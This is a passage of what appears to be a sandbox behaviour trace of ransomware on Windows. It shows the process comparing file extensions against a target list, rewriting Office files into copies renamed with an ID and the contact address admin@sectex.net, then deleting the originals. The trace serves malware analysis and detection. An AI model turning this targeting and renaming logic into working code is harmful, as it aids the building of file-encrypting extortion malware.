	[0161.257] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0161.257] lstrlenW (lpString=".bz2") returned 4
	[0161.257] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0161.257] lstrlenW (lpString=".7z") returned 3
	[0161.257] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0161.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTE.CFG") returned 62
	[0161.257] lstrlenW (lpString=".dbf") returned 4
	[0161.257] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0161.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTE.CFG") returned 62
	[0161.257] lstrlenW (lpString=".1cd") returned 4
	[0161.257] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0161.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTE.CFG") returned 62
	[0161.257] lstrlenW (lpString=".jpg") returned 4
	[0161.257] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0161.258] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0161.258] lstrlenW (lpString="OMSSMS.CFG") returned 10
	[0161.258] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSSMS.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\omssms.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.258] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=603) returned 1
	[0161.258] CloseHandle (hObject=0x3f0) returned 1
	[0161.258] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSSMS.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\omssms.cfg")) returned 0x20
	[0161.258] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSSMS.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\omssms.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.259] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSSMS.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\omssms.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.259] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.259] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.259] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSSMS.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\omssms.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0161.260] GetLastError () returned 0x0
	[0161.260] ReadFile (in: hFile=0x3f0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x25b, lpOverlapped=0x0) returned 1
	[0161.261] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x260, lpOverlapped=0x0) returned 1
	[0161.262] ReadFile (in: hFile=0x3f0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.262] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0161.262] SetEndOfFile (hFile=0x3c4) returned 1
	[0161.262] CloseHandle (hObject=0x3c4) returned 1
	[0161.262] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.262] SetEndOfFile (hFile=0x3f0) returned 1
	[0161.264] CloseHandle (hObject=0x3f0) returned 1
	[0161.265] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSSMS.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.265] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSSMS.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\omssms.cfg")) returned 1
	[0161.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSSMS.CFG") returned 64
	[0161.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSSMS.CFG") returned 64
	[0161.266] lstrlenW (lpString=".doc") returned 4
	[0161.266] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0161.266] lstrlenW (lpString=".docx") returned 5
	[0161.266] lstrcmpiW (lpString1=".docx", lpString2="S.CFG") returned -1
	[0161.266] lstrlenW (lpString=".pdf") returned 4
	[0161.266] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0161.266] lstrlenW (lpString=".xls") returned 4
	[0161.266] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0161.266] lstrlenW (lpString=".xlsx") returned 5
	[0161.266] lstrcmpiW (lpString1=".xlsx", lpString2="S.CFG") returned -1
	[0161.266] lstrlenW (lpString=".ppt") returned 4
	[0161.266] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0161.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSSMS.CFG") returned 64
	[0161.266] lstrlenW (lpString=".zip") returned 4
	[0161.266] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0161.266] lstrlenW (lpString=".rar") returned 4
	[0161.266] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0161.266] lstrlenW (lpString=".bz2") returned 4
	[0161.266] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0161.266] lstrlenW (lpString=".7z") returned 3
	[0161.266] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0161.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSSMS.CFG") returned 64
	[0161.266] lstrlenW (lpString=".dbf") returned 4
	[0161.266] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0161.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSSMS.CFG") returned 64
	[0161.266] lstrlenW (lpString=".1cd") returned 4
	[0161.266] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0161.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSSMS.CFG") returned 64
	[0161.266] lstrlenW (lpString=".jpg") returned 4
	[0161.266] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0161.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSSMS.CFG") returned 64
	[0161.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSSMS.CFG") returned 64
	[0161.267] lstrlenW (lpString=".doc") returned 4
	[0161.267] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0161.267] lstrlenW (lpString=".docx") returned 5
	[0161.267] lstrcmpiW (lpString1=".docx", lpString2="S.CFG") returned -1
	[0161.267] lstrlenW (lpString=".pdf") returned 4
	[0161.267] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0161.267] lstrlenW (lpString=".xls") returned 4
	[0161.267] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0161.267] lstrlenW (lpString=".xlsx") returned 5
	[0161.267] lstrcmpiW (lpString1=".xlsx", lpString2="S.CFG") returned -1
	[0161.267] lstrlenW (lpString=".ppt") returned 4
	[0161.267] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0161.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSSMS.CFG") returned 64
	[0161.267] lstrlenW (lpString=".zip") returned 4
	[0161.267] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0161.267] lstrlenW (lpString=".rar") returned 4
	[0161.267] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0161.267] lstrlenW (lpString=".bz2") returned 4
	[0161.267] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0161.267] lstrlenW (lpString=".7z") returned 3
	[0161.267] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0161.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSSMS.CFG") returned 64
	[0161.267] lstrlenW (lpString=".dbf") returned 4
	[0161.267] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0161.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSSMS.CFG") returned 64
	[0161.267] lstrlenW (lpString=".1cd") returned 4
	[0161.267] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0161.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSSMS.CFG") returned 64
	[0161.267] lstrlenW (lpString=".jpg") returned 4
	[0161.267] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0161.268] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0161.268] lstrlenW (lpString="OOFL.ICO") returned 8
	[0161.268] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\oofl.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.268] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=1078) returned 1
	[0161.268] CloseHandle (hObject=0x3f0) returned 1
	[0161.268] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\oofl.ico")) returned 0x20
	[0161.268] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\oofl.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.269] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\oofl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.269] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.269] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.269] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\oofl.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0161.269] GetLastError () returned 0x0
	[0161.270] ReadFile (in: hFile=0x3f0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x436, lpOverlapped=0x0) returned 1
	[0161.273] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x440, lpOverlapped=0x0) returned 1
	[0161.274] ReadFile (in: hFile=0x3f0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.274] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0161.274] SetEndOfFile (hFile=0x3c4) returned 1
	[0161.274] CloseHandle (hObject=0x3c4) returned 1
	[0161.274] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.274] SetEndOfFile (hFile=0x3f0) returned 1
	[0161.276] CloseHandle (hObject=0x3f0) returned 1
	[0161.276] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.276] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\oofl.ico")) returned 1
	[0161.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFL.ICO") returned 62
	[0161.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFL.ICO") returned 62
	[0161.277] lstrlenW (lpString=".doc") returned 4
	[0161.277] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.277] lstrlenW (lpString=".docx") returned 5
	[0161.277] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0161.277] lstrlenW (lpString=".pdf") returned 4
	[0161.277] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.277] lstrlenW (lpString=".xls") returned 4
	[0161.277] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.277] lstrlenW (lpString=".xlsx") returned 5
	[0161.277] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0161.277] lstrlenW (lpString=".ppt") returned 4
	[0161.277] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFL.ICO") returned 62
	[0161.277] lstrlenW (lpString=".zip") returned 4
	[0161.277] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.277] lstrlenW (lpString=".rar") returned 4
	[0161.277] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.278] lstrlenW (lpString=".bz2") returned 4
	[0161.278] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.278] lstrlenW (lpString=".7z") returned 3
	[0161.278] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFL.ICO") returned 62
	[0161.278] lstrlenW (lpString=".dbf") returned 4
	[0161.278] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFL.ICO") returned 62
	[0161.278] lstrlenW (lpString=".1cd") returned 4
	[0161.278] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFL.ICO") returned 62
	[0161.278] lstrlenW (lpString=".jpg") returned 4
	[0161.278] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFL.ICO") returned 62
	[0161.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFL.ICO") returned 62
	[0161.278] lstrlenW (lpString=".doc") returned 4
	[0161.278] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.278] lstrlenW (lpString=".docx") returned 5
	[0161.278] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0161.278] lstrlenW (lpString=".pdf") returned 4
	[0161.278] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.278] lstrlenW (lpString=".xls") returned 4
	[0161.278] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.278] lstrlenW (lpString=".xlsx") returned 5
	[0161.278] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0161.278] lstrlenW (lpString=".ppt") returned 4
	[0161.278] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFL.ICO") returned 62
	[0161.278] lstrlenW (lpString=".zip") returned 4
	[0161.278] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.278] lstrlenW (lpString=".rar") returned 4
	[0161.278] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.279] lstrlenW (lpString=".bz2") returned 4
	[0161.279] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.279] lstrlenW (lpString=".7z") returned 3
	[0161.279] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFL.ICO") returned 62
	[0161.279] lstrlenW (lpString=".dbf") returned 4
	[0161.279] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFL.ICO") returned 62
	[0161.279] lstrlenW (lpString=".1cd") returned 4
	[0161.279] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFL.ICO") returned 62
	[0161.279] lstrlenW (lpString=".jpg") returned 4
	[0161.279] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.279] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0161.279] lstrlenW (lpString="OOFS.ICO") returned 8
	[0161.279] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\oofs.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.280] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=2998) returned 1
	[0161.280] CloseHandle (hObject=0x3f0) returned 1
	[0161.281] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\oofs.ico")) returned 0x20
	[0161.282] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\oofs.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.282] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\oofs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.282] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.282] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.282] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\oofs.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0161.318] GetLastError () returned 0x0
	[0161.318] ReadFile (in: hFile=0x3f0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0161.319] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0161.320] ReadFile (in: hFile=0x3f0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.320] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0161.320] SetEndOfFile (hFile=0x3c4) returned 1
	[0161.320] CloseHandle (hObject=0x3c4) returned 1
	[0161.320] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.321] SetEndOfFile (hFile=0x3f0) returned 1
	[0161.322] CloseHandle (hObject=0x3f0) returned 1
	[0161.323] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.323] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\oofs.ico")) returned 1
	[0161.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFS.ICO") returned 62
	[0161.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFS.ICO") returned 62
	[0161.323] lstrlenW (lpString=".doc") returned 4
	[0161.323] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.324] lstrlenW (lpString=".docx") returned 5
	[0161.324] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0161.324] lstrlenW (lpString=".pdf") returned 4
	[0161.324] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.324] lstrlenW (lpString=".xls") returned 4
	[0161.324] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.324] lstrlenW (lpString=".xlsx") returned 5
	[0161.324] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0161.324] lstrlenW (lpString=".ppt") returned 4
	[0161.324] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFS.ICO") returned 62
	[0161.324] lstrlenW (lpString=".zip") returned 4
	[0161.324] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.324] lstrlenW (lpString=".rar") returned 4
	[0161.324] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.324] lstrlenW (lpString=".bz2") returned 4
	[0161.324] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.324] lstrlenW (lpString=".7z") returned 3
	[0161.324] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFS.ICO") returned 62
	[0161.324] lstrlenW (lpString=".dbf") returned 4
	[0161.324] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFS.ICO") returned 62
	[0161.324] lstrlenW (lpString=".1cd") returned 4
	[0161.324] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFS.ICO") returned 62
	[0161.324] lstrlenW (lpString=".jpg") returned 4
	[0161.324] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFS.ICO") returned 62
	[0161.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFS.ICO") returned 62
	[0161.324] lstrlenW (lpString=".doc") returned 4
	[0161.325] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.325] lstrlenW (lpString=".docx") returned 5
	[0161.325] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0161.325] lstrlenW (lpString=".pdf") returned 4
	[0161.325] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.325] lstrlenW (lpString=".xls") returned 4
	[0161.325] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.325] lstrlenW (lpString=".xlsx") returned 5
	[0161.325] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0161.325] lstrlenW (lpString=".ppt") returned 4
	[0161.325] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFS.ICO") returned 62
	[0161.325] lstrlenW (lpString=".zip") returned 4
	[0161.325] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.325] lstrlenW (lpString=".rar") returned 4
	[0161.325] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.325] lstrlenW (lpString=".bz2") returned 4
	[0161.325] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.325] lstrlenW (lpString=".7z") returned 3
	[0161.325] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
